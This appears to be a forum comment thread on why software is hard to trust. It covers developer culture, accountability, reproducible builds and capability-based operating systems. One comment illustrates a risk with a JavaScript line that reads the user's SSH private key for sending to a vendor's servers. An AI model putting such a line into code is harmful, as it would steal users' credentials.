Why it's hard to trust software, but you mostly have to anyway

  • Before the modern Cloud took shape, developers (or at least, the software they created) used to be more trustworthy.

    I love those classic tools from the likes of Sysinternals or Nirsoft. I didn't hesitate to give them full access to my machine, because I was confident they'd (mostly) work as expected. Although I couldn't inspect their source, I could reason about how they should behave, and the prevailing culture of the time was one where I knew the developers and myself shared a common set of expectations.

    Their creators didn't tend to pull stunts like quietly vacuuming all your data up to themselves. When they did want feedback, they asked you for it first.

    There wasn't such a potent "extract value" anti-culture, and successful companies recognized enduring value came from working in the user's best interest (eg. early Google resisted cluttering their search results).

    Although silos existed (like proprietary data formats), there was at least an implicit acknowledgement and expectation you retained ownership and control over the data itself.

    Distribution wasn't locked behind appstores. Heck, license enforcement in early Office and Windows was based on the honour system - talk about an ecosystem of trust.

    One way to work toward a healthier zeitgeist is to advocate tirelessly for the user at every opportunity you get, and stand by your gut feeling of what is right - even when faced with opposing headwinds.

  • Software had it way too easy for way too long. You could ship faulty code to billions without anyone blinking an eye. It was just harmless ideas after all.

    The stakes are now higher with data being so important and the advent of algorithms that affect people directly. From health insurance claims, to automated trading, social media drugs and ai companions, bad code today can and does ruin lives.

    Software engineers, like every other engineer have to be held accountable for code they sign off and ship. Their livelihoods should be on the line.

  • I consider myself quite promiscuous when trusting software but sometimes just can't. Seeing how signal desktop does 100MB updates every week, or the big ball of coalesced mud that is typescript compiler, made me avoid these. Why there isn't more pushback against that complexity?

  • The only person tackling the verifiable hardware side of things seems to be Bunnie Huang with his work on the Precursor

    If you're going to be militant and absolutist about things, that seems like the best place to start

    And then probably updating your software incredibly slowly at a rate that can actually be reviewed

    Software churn is so incredibly high that my impression is that only some core encryption algo really get scrutinized

  • While it seems mostly about the individual level. The thing that always bugged me was that organizations seemed to fail to get a warranty on software. If you're going to be forking over millions of dollars like get a real warranty that it's going to work or spend that millions doing it yourself ...

    Of course, warranty still has the counter-party risk that they go out of business (probably because of all the lawsuits about a bad software ...).

  • For most software, I trust the supply chain more than the developers. And I don't trust the supply chain.

    A big problem is user hostile software (and products in general). I'm not able to walk into a Walmart and buy a TV or walk into a dealership and buy a new car, because there are no options that aren't user hostile.

    Options exist, but I have to go out of my way to buy them.

  • Excellent. Wish he had cited Thompson's "Reflections on Trusting Trust" from half a century ago:

    * https://www.cs.cmu.edu/~rdriley/487/papers/Thompson_1984_Ref...

  • The section titled "Verifying the Build" describes recompilation of the software with the same build toolchain and so on as a difficult task, but that's exactly what tools like Guix do for you. It's true that a build that's nondeterministic will trip you up, but if the build process is deterministic and avoids including timestamps for example then we do have tools that can ensure the build environment is consistent.

    But aside from that, yes, we still need to trust our software to a large degree especially on desktop operating systems. I would like to see more object capability systems start to show up so we can more effectively isolate software that we don't fully trust. (WebAssembly and WASI feel like they might be particularly interesting in that regard.)

  • The real problem are the web applications and encasulated web applications (electron, etc) which download their executable code entirely anew each time you run them. They can just add something like require('fs').readFileSync(process.env.HOME + '/.ssh/id_rsa').toString() and send this to their servers, and you won't even notice that (since it doesn't require an update on client because the client is just a browser with full permissions that loads obfuscated code from their servers every time you launch it).

    An installed binary is much more verifiable and secure and trustworthy.

  • Maybe in the future we will agree on using only standardized, verified, shared software so we can really trust software?

  • While it certainly does not solve everything, the work being done with verifiable VMs is very interesting.

    Today's most advanced projects are able to compile pretty much arbitrary rust code into provable RISC-V programs (using SNARKs).

    Imo that solves a good chunk of the problem of proving to software users that what they get is what they asked for.

  • This reminds me of a short fiction story I read on HN ages ago about two programmers that find some word code in a program that turns out to be some AI hiding itself in all known compilers so when ever any software was created it was present. Can't for the life of me remember the name of the story or author though.

  • Lately there's been a surge in the number of open source in name only software, which hoodwink gullible (and often technical) users into downloading crapware laden binaries from their github releases page, which have little or nothing to do with the source code on the repo.

  • It doesn't help that this article starts with a strawman : it's like making fun of people that want political deliberations and decisions to be out in the open : "what, you don't trust representatives that you, yourself, voted for ?" "you're never going to read the transcripts anyway!"

  • In many dimensions the software you can trust is the one you author, compile and ship yourself. Vulnerabilities cannot be avoided only mitigated.

  • All of this effort is like putting Lipstick on a Pig.

    Imagine if we ran the electrical grid this way... with inspections, certifications, and all manner of paperwork. That world would be hell.

    Instead we carefully capabilities at the source, with circuit breakers, fuses, and engineering of same so that the biggest circuit breakers trip last.

    Capabilities based operating systems limit capabilities at the source, and never trust the application. CapROS, KeyKOS, and EROS have lead the way. I'm hopeful Hurd or Genode can be our daily driver in the future. Wouldn't it be awesome to be able to just use software without trusting it?

  • I’m probably gonna get downvoted into oblivion for this but did anyone else notice the kid in the trench coat has six fingers on his right hand?

  • clicks on link

    "image by chatgpt"

    I'm just gonna assume the rest of this post is also AI-generated waffle. closes tab

  • Another article immediately skipped for leading with GenAI image slop.

  • Fortunately, we have Bitcoin, which is trustless.